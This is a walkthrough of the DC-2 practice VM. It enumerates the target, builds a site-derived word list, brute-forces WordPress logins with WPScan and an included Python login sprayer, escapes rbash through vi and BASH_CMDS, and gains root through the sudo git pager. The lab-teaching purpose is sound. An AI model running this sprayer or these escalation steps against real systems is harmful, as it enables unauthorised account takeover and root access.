Detailed process of DC-2 range construction and penetration practice (DC range Series)
2022-07-04 16:35:00 【Golden silk】
Catalog
One. Information gathering
1. Detecting the target host IP address
2. Full port and service scan of the target IP
3. Web information gathering
4. Directory scanning
Two. Web-side penetration
1. Dictionary generation
2. Username enumeration
3. Password brute force
Three. Host-side penetration
1. SSH remote login
2. rbash escape (one Linux privilege-escalation step)
3. Switching users with su
4. Privilege escalation via git
Four. Summary
1. Dictionary generation tool cewl
2. Scanning tool WPScan (WordPress only)
3. Some Linux commands
4. rbash escape
DC-2 download address: http://www.five86.com/downloads/DC-2.zip
The setup is the same as for DC-1: put Kali and DC-2 on the same network segment.
One. Information gathering
1. Detecting the target host IP address
arp-scan -l
2. Full port and service scan of the target IP
nmap -A -p- 192.168.120.131
Port 80 (HTTP) is open, and SSH is listening on the non-default port 7744.
The http-title script also reports: Did not follow redirect to http://dc-2/
The site redirects to the hostname dc-2, which has to resolve locally or the site cannot be reached. Open /etc/hosts and add the entry
192.168.120.131 dc-2
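As an added example (not part of the original post), the recon steps above can be turned into a few reusable checks in Python: parse the nmap output for open ports, pull the redirect hostname out of the http-title line, and add the /etc/hosts entry without creating duplicates. The nmap output in the block is constructed to match the findings above (80/http, 7744/ssh, redirect to http://dc-2/), and the hosts update is demonstrated against a temporary file rather than the real /etc/hosts.

```python
"""Pull the two facts that matter out of the recon step (open ports and the
hostname the web server redirects to) and write the /etc/hosts entry once.

Added example for this write-up, not part of the original post. SAMPLE_NMAP is
constructed to mirror what the post reports; a real run would feed in the
saved output of `nmap -A -p- <ip> -oN scan.txt`.
"""
from __future__ import annotations

import os
import re
import tempfile
from typing import List, Optional, Tuple
from urllib.parse import urlparse

# Constructed sample of nmap's normal output, trimmed to the relevant lines.
SAMPLE_NMAP = """\
Nmap scan report for 192.168.120.131
Host is up (0.00045s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd
|_http-title: Did not follow redirect to http://dc-2/
7744/tcp open  ssh     OpenSSH (protocol 2.0)
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$", re.M)
REDIRECT = re.compile(r"Did not follow redirect to (\S+)")


def parse_open_ports(text: str) -> List[Tuple[int, str, str, str]]:
    """Return (port, proto, service, version) for every line nmap marks open."""
    return [(int(p), proto, svc, ver.strip()) for p, proto, svc, ver in PORT_LINE.findall(text)]


def port_for_service(ports, service: str) -> Optional[int]:
    """First open port running the named service; catches SSH on 7744 instead of 22."""
    return next((p for p, _proto, svc, _ver in ports if svc == service), None)


def redirect_hostname(text: str) -> Optional[str]:
    """Hostname from the redirect that nmap's http-title script could not follow."""
    m = REDIRECT.search(text)
    return urlparse(m.group(1)).hostname if m else None


def ensure_hosts_entry(path: str, ip: str, hostname: str) -> bool:
    """Append 'ip hostname' to a hosts file unless that mapping already exists.

    Returns True when a line was added. Refuses to add a second mapping if the
    name already points at a different IP, which would silently send the
    browser to the wrong host.
    """
    try:
        with open(path) as fh:
            text = fh.read()
    except FileNotFoundError:
        text = ""
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()  # drop comments, split on whitespace
        if len(fields) >= 2 and hostname in fields[1:]:
            if fields[0] == ip:
                return False
            raise ValueError(f"{hostname} already maps to {fields[0]} in {path}")
    with open(path, "a") as fh:
        if text and not text.endswith("\n"):
            fh.write("\n")  # do not glue our entry onto an unterminated last line
        fh.write(f"{ip} {hostname}\n")
    return True


def demo_hosts_update(scan_text: str = SAMPLE_NMAP) -> Tuple[bool, bool, str]:
    """Run the chain against a throwaway hosts file instead of /etc/hosts.

    Returns (added on first call, added on second call, resulting file contents).
    """
    ip = re.search(r"Nmap scan report for (\S+)", scan_text).group(1)
    host = redirect_hostname(scan_text)
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "hosts")
        with open(path, "w") as fh:
            fh.write("127.0.0.1 localhost")  # no trailing newline on purpose
        first = ensure_hosts_entry(path, ip, host)
        second = ensure_hosts_entry(path, ip, host)  # idempotent: nothing added
        with open(path) as fh:
            contents = fh.read()
    return first, second, contents


if __name__ == "__main__":
    ports = parse_open_ports(SAMPLE_NMAP)
    for port, proto, svc, ver in ports:
        print(f"{port}/{proto} {svc} {ver}")
    print("ssh port:", port_for_service(ports, "ssh"))
    print("hostname to add:", redirect_hostname(SAMPLE_NMAP))
    print(demo_hosts_update()[2])
```

Running it against a real scan only changes the input: read the `-oN` file into `scan_text` and point `ensure_hosts_entry` at /etc/hosts (as root). The refusal on a conflicting mapping is the part worth keeping; a stale dc-2 line from another lab VM is an easy way to spend an hour attacking the wrong box.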
3. Web information gathering
Open the site in a browser at 192.168.120.131 (the redirect to http://dc-2/ now works thanks to the hosts entry)
There is a Flag menu item. Open flag1 and translate it
It hints that we should build a dictionary with cewl; the usual CMS exploits do not work on this level (don't ask why, I tried many times and failed)
4. Directory scanning
Use dirsearch to scan the site's directories
dirsearch -u http://dc-2/ -e '*' -x 403,404
-u target URL
-e extensions to append, e.g. php, asp, or * for all (quoted so the shell does not expand it against the current directory)
-x status codes to filter out, given as a comma-separated list; responses with these codes are not shown
The scan turns up a login page, so let's take a look
It is indeed the backend login page. All we need now is a valid username and password
Two. Web-side penetration
1. Dictionary generation
flag1 warned us that an ordinary dictionary probably will not work: cewl has to crawl the target site and build a dictionary from its own content
- For usage, see the article Kali password attack tools: Cewl usage guide
cewl http://dc-2/ -w /root/Desktop/dict.txt
This crawls http://dc-2/ and writes the resulting word list to dict.txt on the desktop
2. Username enumeration
First, a brief introduction to WPScan (see Kali (penetration tools): WPScan usage)
WordPress is one of the most popular blogging platforms in the world and many sites are built on it, but it has a long history of vulnerabilities in the core, plugins and themes. WPScan is a scanner built specifically for this CMS
wpscan --url http://dc-2/ -e u
Three usernames are found. Create uname.txt on the desktop and put them in it:
admin
jerry
tom
3. Password brute force
Again use wpscan, this time with uname.txt as the username list and the cewl-generated dict.txt as the password list
wpscan --url http://dc-2/ -U /root/Desktop/uname.txt -P /root/Desktop/dict.txt
The passwords for jerry and tom are recovered:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
Log in to the backend as jerry
flag2 is in jerry's account. It tells us that a CMS vulnerability will not give us a shell here, so we need another way in
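The two tools do a lot more than shown, but the core of the chain (build a word list from the site's own text, then test every user/password pair against wp-login.php and recognise a successful login) fits in one Python example. It is added here and is not part of the original post, nor cewl's or WPScan's code: the HTML page, the fake login endpoint and the user list are constructed for the demo, and the two valid pairs are the ones the scan above recovered. Against a live target you would pass `http_post` instead of `fake_wp_login`.

```python
"""Site-derived word list plus WordPress login spraying, in one offline example.

Added for this write-up; not cewl's or WPScan's code. SAMPLE_HTML, VALID and
fake_wp_login are constructed stand-ins so the chain runs without a target.
"""
from __future__ import annotations

import re
import urllib.error
import urllib.parse
import urllib.request
from html.parser import HTMLParser
from typing import Callable, Dict, List, Tuple

Response = Tuple[int, Dict[str, str], str]          # (status, headers, body)
Poster = Callable[[str, Dict[str, str]], Response]   # post(url, form) -> Response

# --- 1. cewl-style dictionary: visible words of at least MIN_LEN letters, de-duplicated
MIN_LEN = 3  # cewl's default minimum word length


class _TextExtractor(HTMLParser):
    """Collect text nodes, ignoring <script> and <style> contents."""
    def __init__(self) -> None:
        super().__init__()
        self.chunks: List[str] = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)


def words_from_html(html: str, min_len: int = MIN_LEN) -> List[str]:
    """Unique words in page order, i.e. what a crawler-built list fed to wpscan -P looks like."""
    parser = _TextExtractor()
    parser.feed(html)
    seen, words = set(), []
    for w in re.findall(r"[A-Za-z]+", " ".join(parser.chunks)):
        if len(w) >= min_len and w not in seen:
            seen.add(w)
            words.append(w)
    return words


# --- 2. WordPress login check: a valid login answers with a redirect and sets wordpress_logged_in_*
def login_succeeded(resp: Response) -> bool:
    status, headers, _body = resp
    return status in (301, 302) and "wordpress_logged_in_" in headers.get("Set-Cookie", "")


def spray(post: Poster, login_url: str, users: List[str], passwords: List[str]) -> Dict[str, str]:
    """Try each password for each user, stopping per user at the first success."""
    found: Dict[str, str] = {}
    for user in users:
        for pwd in passwords:
            form = {"log": user, "pwd": pwd, "wp-submit": "Log In", "testcookie": "1"}
            if login_succeeded(post(login_url, form)):
                found[user] = pwd
                break
    return found


# --- 3. transports: a real one for a live target and a fake one so the demo runs offline
class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # keep the 302 visible instead of following it


def http_post(url: str, form: Dict[str, str]) -> Response:
    """POST the form to a real wp-login.php (not used by the offline demo)."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, data=urllib.parse.urlencode(form).encode())
    try:
        with opener.open(req, timeout=10) as r:
            hdrs, status, body = r.headers, r.status, r.read()
    except urllib.error.HTTPError as e:  # 3xx lands here once redirects are disabled
        hdrs, status, body = e.headers, e.code, e.read()
    headers = dict(hdrs.items())
    headers["Set-Cookie"] = "; ".join(hdrs.get_all("Set-Cookie", []))  # merge repeated cookies
    return status, headers, body.decode(errors="replace")


VALID = {"jerry": "adipiscing", "tom": "parturient"}  # constructed fake target's accounts


def fake_wp_login(url: str, form: Dict[str, str]) -> Response:
    """Stand-in for wp-login.php that mimics WordPress's success and failure responses."""
    if VALID.get(form["log"]) == form["pwd"]:
        cookie = f"wordpress_logged_in_0123abcd={form['log']}|1700000000|token|hmac; path=/"
        return 302, {"Location": url.replace("wp-login.php", "wp-admin/"), "Set-Cookie": cookie}, ""
    return 200, {}, '<div id="login_error"><strong>ERROR</strong>: incorrect password.</div>'


# Constructed page text with the same kind of Latin filler the two passwords came from.
SAMPLE_HTML = """<html><head><title>DC-2</title><style>p{margin:0}</style></head><body>
<h1>Welcome</h1><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec
parturient montes nascetur ridiculus.</p><script>var notaword = 1;</script></body></html>"""


def demo() -> Dict[str, str]:
    """Build the word list from the sample page and spray it against the fake login."""
    users = ["admin", "jerry", "tom"]
    return spray(fake_wp_login, "http://dc-2/wp-login.php", users, words_from_html(SAMPLE_HTML))


if __name__ == "__main__":
    print(demo())  # {'jerry': 'adipiscing', 'tom': 'parturient'}
```

The success check is the part people get wrong: WordPress answers a failed login with HTTP 200 and the form again, and a good one with a redirect plus the `wordpress_logged_in_` cookie, so following redirects automatically (which urllib and requests both do by default) hides the signal. The `_NoRedirect` handler keeps the 302 visible.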
Three. Host-side penetration
1. SSH remote login
SSH passwords can be brute-forced with hydra, but we already hold two sets of credentials, so try those first. The earlier scan found SSH on port 7744, so the login command is
ssh <username>@<host> -p <port>
Let's try logging in
ssh jerry@192.168.120.131 -p 7744
Answer yes to the host-key prompt, then enter the password
No matter how I entered the password it was wrong, so jerry evidently cannot log in over SSH. Try tom instead
ssh tom@192.168.120.131 -p 7744
That works. Check who we are and try a few commands
whoami
Ordinary commands fail with "restricted" errors: the login shell is rbash (restricted bash), which blocks cd, changes to PATH, slashes in command names and output redirection, so the account is very limited
2. rbash escape (one Linux privilege-escalation step)
For the full list of techniques see Summary of rbash escape methods
First, see what rbash still allows us to run
echo $PATH
# shows the directories searched for commands
# output: /home/tom/usr/bin
echo /home/tom/usr/bin/*
# lists the binaries in that directory (the slash restriction only applies to command names, not arguments)
Four commands are available, and the only useful one is vi, the editor. We can break out of rbash either from inside vi or by setting a shell through BASH_CMDS, then fix PATH so the normal commands are found
- Method 1: set the shell from vi
Open the vi editor
vi
Press Esc and type
:set shell=/bin/bash
This sets the shell; press Enter, then type
:shell
and press Enter to start it
Being dropped out of vi into a new prompt means it worked. Check the shell again
It is now an unrestricted bash. cat still fails, because PATH only contains /home/tom/usr/bin; append the standard directories
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
- Method 2: set a shell through BASH_CMDS
Set the shell and run it
BASH_CMDS[x]=/bin/bash
# makes the command name x resolve to /bin/bash in bash's command hash table
x
# equivalent to starting the shell
Newer bash releases refuse assignments to BASH_CMDS in restricted mode, so this only works on older builds such as the one on DC-2
Commands are still missing, so add the directories to PATH again
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
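To see exactly which operations rbash refuses, and to check whether Method 2 would even work on a given bash build, here is a small probe added for this write-up (not from the original post). It assumes bash is installed locally and drives it with `bash -r -c`, which puts the shell into the same restricted mode that tom's rbash login on DC-2 runs in; the probe commands are constructed to mirror the limits hit above.

```python
"""Probe what a restricted bash refuses, non-interactively, with subprocess.

Added example for this write-up, not part of the original post. Assumes a
local bash; every command string is run under `bash -r -c` and classified by
exit status plus the diagnostic bash prints for restricted-mode refusals.
"""
from __future__ import annotations

import shutil
import subprocess
from typing import Dict, Tuple

BASH = shutil.which("bash")  # assumption: bash is on PATH

PROBES: Dict[str, str] = {
    "cd /tmp": "change directory",
    "PATH=/bin:/usr/bin": "assign PATH (readonly in rbash)",
    "SHELL=/bin/bash": "assign SHELL (readonly in rbash)",
    "/bin/ls": "run a command by absolute path",
    "echo hi > /tmp/rbash_probe.txt": "redirect output",
    "echo hi": "builtin found without a slash (control: allowed)",
}


def run_restricted(cmd: str) -> Tuple[int, str, str]:
    """Execute one command string under `bash -r` and return (rc, stdout, stderr)."""
    if not BASH:
        raise RuntimeError("bash not found; this probe needs a local bash")
    proc = subprocess.run([BASH, "-r", "-c", cmd], capture_output=True, text=True, timeout=10)
    return proc.returncode, proc.stdout, proc.stderr


def is_blocked(cmd: str) -> bool:
    """True when rbash refused the command: non-zero exit plus the 'restricted'
    or 'readonly variable' message bash prints in that case."""
    rc, _out, err = run_restricted(cmd)
    return rc != 0 and ("restricted" in err or "readonly" in err)


def probe_all() -> Dict[str, bool]:
    """Map every probe command to whether the local rbash blocks it."""
    return {cmd: is_blocked(cmd) for cmd in PROBES}


def bash_cmds_escape_works() -> bool:
    """Method 2 from the write-up, non-interactively: older bash lets a restricted
    shell overwrite the BASH_CMDS hash table so the name x resolves to /bin/sh.
    Newer releases reject the assignment, so the result depends on the local version."""
    rc, out, _err = run_restricted('BASH_CMDS[x]=/bin/sh; x -c "echo escaped"')
    return rc == 0 and "escaped" in out


if __name__ == "__main__":
    for cmd, blocked in probe_all().items():
        print(f"{'BLOCKED' if blocked else 'allowed'}  {cmd:<34} # {PROBES[cmd]}")
    print("BASH_CMDS escape works on this bash:", bash_cmds_escape_works())
```

Note what the probe does not cover: rbash restricts the shell, not the programs it launches, which is exactly why vi's `:shell` (and any other binary in the allowed directory that can spawn a child process) defeats it.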
Next, cat the flag file
cat f*
flag3 is obtained; translate it
It tells us to su to jerry. su is the Linux command for switching users
3. Switching users with su
su jerry
Enter the password recovered earlier and you are logged in as jerry
Now search for flag files
find / -name '*flag*' 2>/dev/null
Apart from flag4.txt, none of them is readable with these permissions. Take a look at flag4.txt
cat /home/jerry/flag4.txt
It hints at git, and at root, which sounds like a privilege-escalation step
4. Privilege escalation via git
The flag already gave a hint, but it is still worth checking for SUID binaries first
find / -user root -perm -4000 -print 2>/dev/null
See A brief talk on SUID privilege escalation
Nothing usable there, so git it is. Check what sudo allows
sudo -l
git may be run as root through sudo. There are two ways to turn that into a root shell; both rely on git handing its help output to a pager (less), and less lets you run a command with !
- The first
sudo git help config
When the manual page opens in the pager, type
!/bin/bash (bash can be replaced by sh)
- The second
sudo git -p help
-p forces git to use the pager even for short output; in the pager, type
!/bin/bash (bash can be replaced by sh)
Privilege escalation succeeded. Now look for the flag file
cd /
find / -name '*flag*' 2>/dev/null
Then open it
cat /root/final*
Woohoo! The final flag
Four. Summary
1. Dictionary generation tool cewl
Crawls a website and builds a dictionary from the words found on it
cewl <website> (e.g. https://www.baidu.com) -w <output file> (e.g. dict.txt)
2. Scanning tool WPScan (WordPress only)
- Username enumeration
wpscan --url <site URL> -e u
-e selects what to enumerate; u means users. Together they enumerate usernames
- Password brute force
wpscan --url <site URL> -U <username list> -P <password list>
3. Some Linux commands
Editor commands
vi (or vim)
Useful during privilege escalation: once inside, press Esc and type the commands
:set shell=/bin/bash (bash can be replaced by sh)
:shell
to get a shell
- View environment variables (mainly to see where executable commands live)
echo $PATH
Note the value of $PATH, for example /home/jerry/bin
List the files under a PATH directory
With the /home/jerry/bin from above, echo /home/jerry/bin/* lists the executable commands
- Add to the environment variable
export PATH=$PATH:<directory>
The usual command directories are /usr/bin/ and /bin/
Add them like this
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
- Switch user
su <username>
Then enter that user's password
4. rbash escape
rbash escape is one of the Linux privilege-escalation techniques
- vi/vim method
vi
Inside the editor press Esc and type
:set shell=/bin/bash
Press Enter, then open our shell with
:shell
Then set the environment variable again
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
- BASH_CMDS method
Use it to set up a shell
BASH_CMDS[x]=/bin/bash (bash can be replaced by sh)
Then run the shell
x
Then set the environment variable again
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/